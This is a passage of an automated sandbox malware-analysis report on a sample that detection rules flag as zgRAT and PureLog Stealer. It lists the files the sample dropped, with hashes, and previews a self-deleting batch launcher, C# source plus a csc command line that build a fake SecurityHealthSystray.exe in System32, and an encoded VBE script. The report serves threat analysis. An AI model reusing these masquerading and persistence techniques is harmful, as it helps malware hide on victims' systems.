Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Temp\5E5NQqYMJa

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:mMNi0QtYFn:m4nF
MD5:	8E5C37D759C49AA8975BA24207EAFA3B
SHA1:	91F9E648640E08452BC01E5B87BC40E7DAED4F12
SHA-256:	A834AE6A180B5390E00F3746CE49C1DD593205B8F36EF9620BB0240C82278185
SHA-512:	2436EAF7FBDF112B2E8255F0C12733E28F2CB43FD9368C7AC925BDD203CE3C1976B2AF81998ABFA83D3396AA8C4DEE60DF43F13A10E4AC06F64388A003531A50
Malicious:	false
Preview:	Lbm41zhVZBlCm1Q3bPH8jxELN

C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Download File

Process:	C:\Users\user\Desktop\KKjubdmzCR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2012853
Entropy (8bit):	7.381688062941801
Encrypted:	false
SSDEEP:	49152:IBJx8MTwI+KLNNZGt7muZ5kpIj1prd7s9:yr8Mz+KLfItr5kpIbts9
MD5:	2DD40499F44DE86BB908734ECF206C6E
SHA1:	34C8A24746ABABB89EB5461833B04015146411A6
SHA-256:	795E4BAF566A6DAA13E4DA0C1DA5732999107062F332080ACD7D314A946CE4AD
SHA-512:	84B1CAD0FEE3B8E417E7FB87CDF597C39FFDC597505DD0EF5EF2FDC1C9242E3605D95E902FBF4B41DA1BCCD47D6F997C34DEF99545C74CBB4DAEAE3EB02F1262
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.206913068663786
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5SMLvW4z7QYXtNSKOZG1wkn23fV0MH:HTg9uYDEfSM7TPUftTH
MD5:	5CDDFA8BEAC9B89C136FAFAD8776A8F0
SHA1:	1E6FB72EBE55590477A571A375C8D09C7E8910E7
SHA-256:	28E2AFA1E4763134DA5C978C3516F218E0C3F23F93D02675CABEA53075C5472F
SHA-512:	81CBE9EDD6D432D1A93521CBA3572E31A3A2AE1AA2BC78131BDC92FF3E7B003B2DCC45D27456FAEFA8625DDAB3A131CBA1D916A0B7861C748388ABB5183261E6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\R1OpfLIrNP.bat"

C:\Users\user\AppData\Local\Temp\RESC1DD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Thu Nov 14 05:15:34 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1944
Entropy (8bit):	4.539542809219448
Encrypted:	false
SSDEEP:	24:HcnjC9TOG7mDfHKWwKccAXN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:Im8WKcxXyluOulajfqXSfbNtmhBZ
MD5:	45AB1495B377843177501EEE81E708FA
SHA1:	162D833F2643CDE5CC8BCF9F4701E9BB704A627F
SHA-256:	E22F2FF4AAC42468E62C3AC619CA23DF10B55BD9417FEB1A8285F8EAD80100F9
SHA-512:	10AC762B4EDE2F18812BD9D61FC48294E4C082CF7E5F63B52B8CDF47F487750923CDAE1B5FE350D2EF3770FC0009985FEDB5020EFB9006383298C22D70640180
Malicious:	false
Preview:	L...v.5g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESC1DD.tmp.-.<....................a..Microsoft (R) CVTRES.U.=..cwd.C:\monitordll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.0.cs

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	373
Entropy (8bit):	4.951559016304818
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JriFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKn
MD5:	663FB64B5F6AAA67E104E07000182AA5
SHA1:	86E16DDAE2532BCE5A88A8B7D9183F2D83FFFC45
SHA-256:	D3773E3E0BC1C5F7DA8775F70B8240ADA1327BCEE2F9C2405320D7C3BFF3819E
SHA-512:	DB068A292C4464F47364313F6A7931EF2B1D5507B2AD5CD69C57C305BD972C17F263219236DBA7CC1D152870AAE92247C405C806CCE1B48C857290D233A32AD7
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\wmnXYZRZEK.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.080240769997512
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fsIP9Zh9:Hu7L//TRq79cQWfkI19
MD5:	23BCC5A9B8F3BA20B2F81119DD3FD615
SHA1:	BD510E9725167C7D1164CF89FBC1793F4D2C5811
SHA-256:	2077C88E4BB5FB76BC781CD7E2C095A747451F2360AD2B69A2D8560F44889A05
SHA-512:	BBD4C10947464866223BB8FAB17903A7C8B35266C32B0520D9FFA53042C0C265873E783523C2CEDEFE8B0250E2461D5D5F010DB5B152E04E42E8A3266210019F
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.0.cs"

C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.out

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (320), with CRLF, CR line terminators
Category:	modified
Size (bytes):	741
Entropy (8bit):	5.25708945864574
Encrypted:	false
SSDEEP:	12:ykYMI/u7L//TRq79cQWfkI14KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:ykYMI/un/Vq79tWf8Kax5DqBVKVrdFAw
MD5:	A6F1C23E65EB8D9BDA36410DB2D13193
SHA1:	7D12051AA1666FB5997AAFCC3F6E332E5AFBFBDE
SHA-256:	1407F78EBD19220EDF85098B558BA0289EC17B95FF27F2C0A52F30DB92F83AC1
SHA-512:	60E79BB6856F251A2807F1C3000E95F65693B6258A56205E03147B5503167BAEDA61C491615C1352A5D3437E27610CE93CD88B7C0B249CA308EDD509838412DE
Malicious:	false
Preview:	.C:\monitordll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\Bootstrapper.exe

Download File

Process:	C:\Users\user\Desktop\KKjubdmzCR.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	819200
Entropy (8bit):	5.598226996524291
Encrypted:	false
SSDEEP:	12288:t0zVvgDNMoWjTmFzAzBocaKjyWtiR1pptHxQ0z:O5vgHWjTwAlocaKjyyItHDz
MD5:	2A4DCF20B82896BE94EB538260C5FB93
SHA1:	21F232C2FD8132F8677E53258562AD98B455E679
SHA-256:	EBBCB489171ABFCFCE56554DBAEACD22A15838391CBC7C756DB02995129DEF5A
SHA-512:	4F1164B2312FB94B7030D6EB6AA9F3502912FFA33505F156443570FC964BFD3BB21DED3CF84092054E07346D2DCE83A0907BA33F4BA39AD3FE7A78E836EFE288
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Ll.g.........."......v............... ....@...... ....................................`.................................................D...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH........................................................................0..R.......(....:....r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o.............8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(...........(....~....%:....&~.........s....%.....(...+...0..l.........(....r...p(....(....r\..p.

C:\Users\user\Desktop\BootstrapperV1.23.exe

Download File

Process:	C:\Users\user\Desktop\Bootstrapper.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	819200
Entropy (8bit):	5.598261375667174
Encrypted:	false
SSDEEP:	12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
MD5:	02C70D9D6696950C198DB93B7F6A835E
SHA1:	30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
SHA-256:	8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
SHA-512:	431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........\|............................................................0..R.......(....:....r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o.............8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(...........(....~....%:....&~.........s....%.....(...+...0..l.........(....r...p(....(....r\..p.

C:\Users\user\Desktop\DISCORD

Download File

Process:	C:\Users\user\Desktop\Bootstrapper.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.081427527984575
Encrypted:	false
SSDEEP:	3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
MD5:	B016DAFCA051F817C6BA098C096CB450
SHA1:	4CC74827C4B2ED534613C7764E6121CEB041B459
SHA-256:	B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
SHA-512:	D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
Malicious:	false
Preview:	{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

C:\Users\user\Desktop\ufQLssLX.log

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9265815963385085
Encrypted:	false
SSDEEP:	48:60zpLPt2M7Jt8Bs3FJsdcV4MKe27fvqBHuOulajfqXSfbNtm:HxPVPc+Vx9MfvkIcjRzNt
MD5:	5E5EF65E4741BADA48455B3210CD0DBE
SHA1:	6D4EA90A7A1009BA9C20174291C21967FE19EA90
SHA-256:	8D6A9E26B3DDE08432DB178FC5DCD93FE79ACF895D354E5FA9840FC8432A8C16
SHA-512:	D8AD8AD72398402FA2B446DEAF72B1B991404F10573EC5530E3B3DE00B3039529835B2E2B8730E0E2DEE7215852A24E2D5112353861A22E0880582345F670B53
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.5g............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4656826191081676
Encrypted:	false
SSDEEP:	6144:dIXfpi67eLPU9skLmb0b4NWSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbx:OXD94NWlLZMM6YFHb+x
MD5:	02EA45C176B10BEE9187C7C4C3DD384D
SHA1:	CE3BDB912FBF8921E175710AA51FF9E6FF67689D
SHA-256:	D13AC87FA013449E3FCCFC819151C2973771449A15183E7D303D0A386E8B7D24
SHA-512:	63705114D888713785F0F72173ECFCB6E1EBBBB30D6FF3AD6D6B20908D11F08E9BA1D60C2A14899B9BFC35483C7E2162B7E7426F255AB79679CA8477871E2D84
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....H6.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\monitordll\2mpoFrNBWk.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
File Type:	data
Category:	dropped
Size (bytes):	195
Entropy (8bit):	5.665008858118547
Encrypted:	false
SSDEEP:	6:GB2wqK+NkLzWbHtWrFnBaORbM5nCQ0PMFFEs:GxMCzWL4hBaORbQCK
MD5:	D806ACB9EF47C4D148690CF78E28A8B7
SHA1:	7747C58F9EF1E9FD16F60182B7E981853EA73B8D
SHA-256:	D7462BBFDC7D30322A5FFEFFCA9867DF2982F351D3BF6ACDC778BA71130EAA77
SHA-512:	AE0100EDF0AF60A38C0F518F734B41C824EE5695EE9013BFC26C77DE8F40D0C0983092A65594BDFD7FF983DD9F37445BEAC41491142EE93E5BC6A23EE31FED91
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^qgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v .!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zhKxbYWMN^szJ4L6ZrA (lYrSPZ~P6Cs/.eTUAAA==^#~@.

C:\monitordll\8ffcf3a6fc94db

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with very long lines (796), with no line terminators
Category:	dropped
Size (bytes):	796
Entropy (8bit):	5.904783664956393
Encrypted:	false
SSDEEP:	24:XtDAejA305HLZDsawfD1kzfTSx2MQPxRfEq7:tjA30LsBDyzfdXfV7
MD5:	66399092613C10B981F845FD248DDA3A
SHA1:	4053DD53B22863B3184985A7CEC66B09626AC72E
SHA-256:	43EB2E670521C47EB14D0D3FA2D1BFFB83F3FA9AB3756818F2BED3994355AB9D
SHA-512:	1D40973F62D3D94316D1FAB65ADDD472EE804D805AAF94E048CA7B6B0C8FC7933070B924E8973D86189340B3918464E306AC3A523F9912A4606ACA116BB63828
Malicious:	false
Preview:	ItxODKz6lx49CKK1Hxz0SL902Os8Fm8KoiiOYCRAfa0DyO9NFpj1gbf6u6Wyb009ytVem5cEfyV1U5BoPe2aCHoMDmdcqcioj1PF2flJMfVsGnlz4rj78a6qFIaAcAXDQqSdp6vt2sNhv5GaAoh92lqJ4iAuElrLHSbZVHK850EPMZ5JBA9xdXKoAIjG6BpRBBZceqF2eiECha7fn0sEl4stIwZMiDC3LwOKAcpV4GT4THHjKEdFSkpHTpUrR2UbgK1uMxfKLXJfkxaApzCej6lkGH0UI8ECw2YJPXXWiT35bKgfPTBc0z1jjRnE6KBNTGssZQvRbp5PDpI6kUFz6mM6Ayk8tSaYSpmUbyG8huAK4mg3IrdlELRq4wrkqxiIPg7XCxewOHRMlBBYSqzCyyUGY5apGfRuM15XpI1UNrX74FF2uSSA8fTaM09GXyqszgAtGotKyezHaXMT0h4xNRwqheKyJu7YBoHXFVwGjILdqMAzoqQz32ehuTLld4AEgbGvPyNeuyOFGSAVeVKddHeIJjnvKKmoHG7OGOk0cwEFoZbbT0HIuhkZ77mpKcUkMj89VvPQvUArCZeuIMcUDe4jghRIm4pAce2FbbFhk1Wag3Whd1h89AhroYdxdHo0oAPhgZTqG5tLHeDmLupuXrAc7LaC8RDdNgvfnyBDi01EQVjKU0mtb3c79xkV8Qsz1Q8lth8WslMh06LmlQrHoTBTDxg0OqERICMAW8bx1QBzr5HDl7usikKiOoh5BIHCg4YxuLPmz4PYSLmHqdOR5Wth1ovs

C:\monitordll\bgx0Ow.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	102
Entropy (8bit):	5.291113057759918
Encrypted:	false
SSDEEP:	3:1gmEh1A6sdUm1Tdpluf5IZ2BIbAgMAgnxL0dAHAymjuU9FA:VEjACC5pof5IkiKAk0pduUY
MD5:	EFBFD0E2FE9F018D1B8A3388920A87B7
SHA1:	29824F587E2AA4195B2024DF9E519FC6481DF1A6
SHA-256:	683769309486A5A1464C40F4C276831E1EF7DCEB39738D76002F6D6F7C94314B
SHA-512:	FB5F549B86104C0E01C9E3F4CB0F70AD76DA12D5E3CB0523F2762F9F200B13435AA86B32FDFAA4A40A0A4AFA3B0D2F04319D3425CAF3A787935CFA36A2AC86D7
Malicious:	false
Preview:	%uvICKGLEXWQP%%hBIxkb%..%fPguFDJTLnKKEwA%"C:\monitordll/componentreviewsavesSession.exe"%WCGeTPgqXoJY%

C:\monitordll\componentreviewsavesSession.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\BootstrapperV1.23.exe
File Type:	ISO-8859 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	575
Entropy (8bit):	4.9334594979655515
Encrypted:	false
SSDEEP:	12:t+3p+t/huLufVaOQsXCzLQ8X+UwkY1v3igBe:Yot/hzltcQy+UwkY1vdBe
MD5:	06F0C1EA2D397BB67D08A021BE16E7F2
SHA1:	10D0313DC2E61081546E7ECDB15A8B64732092AE
SHA-256:	D752DD74ECCC283C93DF541DDCBD236737F14828073D4E4B3CC993BF1C2D3EA6
SHA-512:	7402E60109EB87014C707E89289599E60F75812E492256434ECA693CB3B9053CBCC0766E4A2B4C0579B657C046C5B76BE27CE33CFE57B253C5BE21E076A2CBEC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview:	.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Deleting old bootstrapper.....[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.231316982160249
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	KKjubdmzCR.exe
File size:	4'257'792 bytes
MD5:	75077730d0b0cc562f277d943f68e20a
SHA1:	0d78828e7392660d3f9250417b654f1d5e6ad04b
SHA256:	d967ebc2cbd50a46ac5b686fe92faeb77fea5a148cbb69fba6a2d92eaa1abc53
